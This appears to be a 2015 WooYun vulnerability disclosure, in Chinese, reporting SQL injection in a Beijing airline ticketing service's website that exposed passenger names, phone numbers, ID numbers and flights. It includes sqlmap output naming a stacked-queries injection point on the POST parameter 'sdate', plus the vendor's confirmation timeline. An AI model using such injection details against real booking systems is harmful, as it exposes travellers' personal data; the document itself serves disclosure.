海华航空存在两处SQL注入泄露大量订单信息(姓名、手机、证件号、航班号和起飞时间等)

漏洞概要

缺陷编号:WooYun-2015-0120629

漏洞标题:海华航空存在两处SQL注入泄露大量订单信息(姓名、手机、证件号、航班号和起飞时间等)

相关厂商:北京海华航空服务有限公司

漏洞作者:missy

提交时间:2015-06-17 15:25

公开时间:2015-09-17 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

SQL注入支持UNION

详细说明:

POST注入:

第二处:

<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: sdate (POST)Type: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queries (comment)Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUFZGthZGpkZAIFDw8WAh8ABQwwMTAtNTE2NjIzNTVkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFrg88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvZ2p0aWNrZXRzLmFzcHgiPsK3IOWbvemZheacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvSG90ZWwvIj7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL1RyYWluLyI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXmn6Xor6I8L2E+PGkgY2xhc3M9ImljbzA0Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL09yZGVyL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9SZXR1cm4uYXNweCI+wrcg6YCA56Wo6K6w5b2VPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9zY2dxX2xpc3QuYXNweCI+wrcg5Y2H6Iix5pS55pyf6K6w5b2VPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7orqLljZXlrqHmoLg8L2E+PGkgY2xhc3M9ImljbzA1Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0NoZWNrL2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7lt67ml4XmiqXooag8L2E+PGkgY2xhc3M9ImljbzA2Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL1JlcG9ydC9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdHJhaW4uYXNweCI+wrcg54Gr6L2m56WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvaG90ZWwuYXNweCI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvdmlzYS5hc3B4Ij7CtyDnrb7or4E8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9ieC5hc3B4Ij7CtyDkv53pmak8L2E+PC9saT48bGk+PGEgaHJlZj0iL1JlcG9ydC9vdGhlci5hc3B4Ij7CtyDlhbblroM8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPui0ouWKoeeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDciPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL2Zrc3FfbWViLmFzcHgiPsK3IOS7mOasvueUs+ivt+iusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3BheV9oaXN0b3J5LmFzcHgiPsK3IOW3suS7mOasvuiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL29yZGVyc19hbGwuYXNweCI+wrcg57u85ZCI57uf6K6hPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwveGNkX29yZGVycy5hc3B4Ij7CtyDooYznqIvljZXkuqTmjqU8L2E+PC9saT48L3VsPjwvbGk+ZAILDxYCHgtfIUl0ZW1Db3VudGZkAg0PZBYGAgEPDxYCHwAFX0NvcHlyaWdodCAmY29weTsgMjAxNCBoaGNsLmgtaC5jb20uY24gYWxsIHJpZ2h0cyByZXNlcnZlZC4g5YyX5Lqs5rW35Y2O6Iiq56m65pyN5Yqh5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAUx5Zyw5Z2A77ya5YyX5Lqs5biC5Lic5Z+O5Yy65a6J5b636Lev55SyMTDlj7c1LTEwNWRkAgUPDxYCHwAFK+eUteivne+8mjAxMC01MTY2MjM1NSDkvKDnnJ/vvJowMTAtNTE2Njg0NTBkZGQ4DgfmxxdQd1D4B9sSChUIuH8jnZxCNN1XTiLowCZMtA==&__EVENTVALIDATION=/wEWCgL176S6AgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7A

漏洞证明:

修复方案:

过滤

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-1917:19

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无

评价

  1. 2010-01-01 00:00 疯狗 白帽子 | Rank:22 漏洞数:2)

    机票诈骗最近有点回春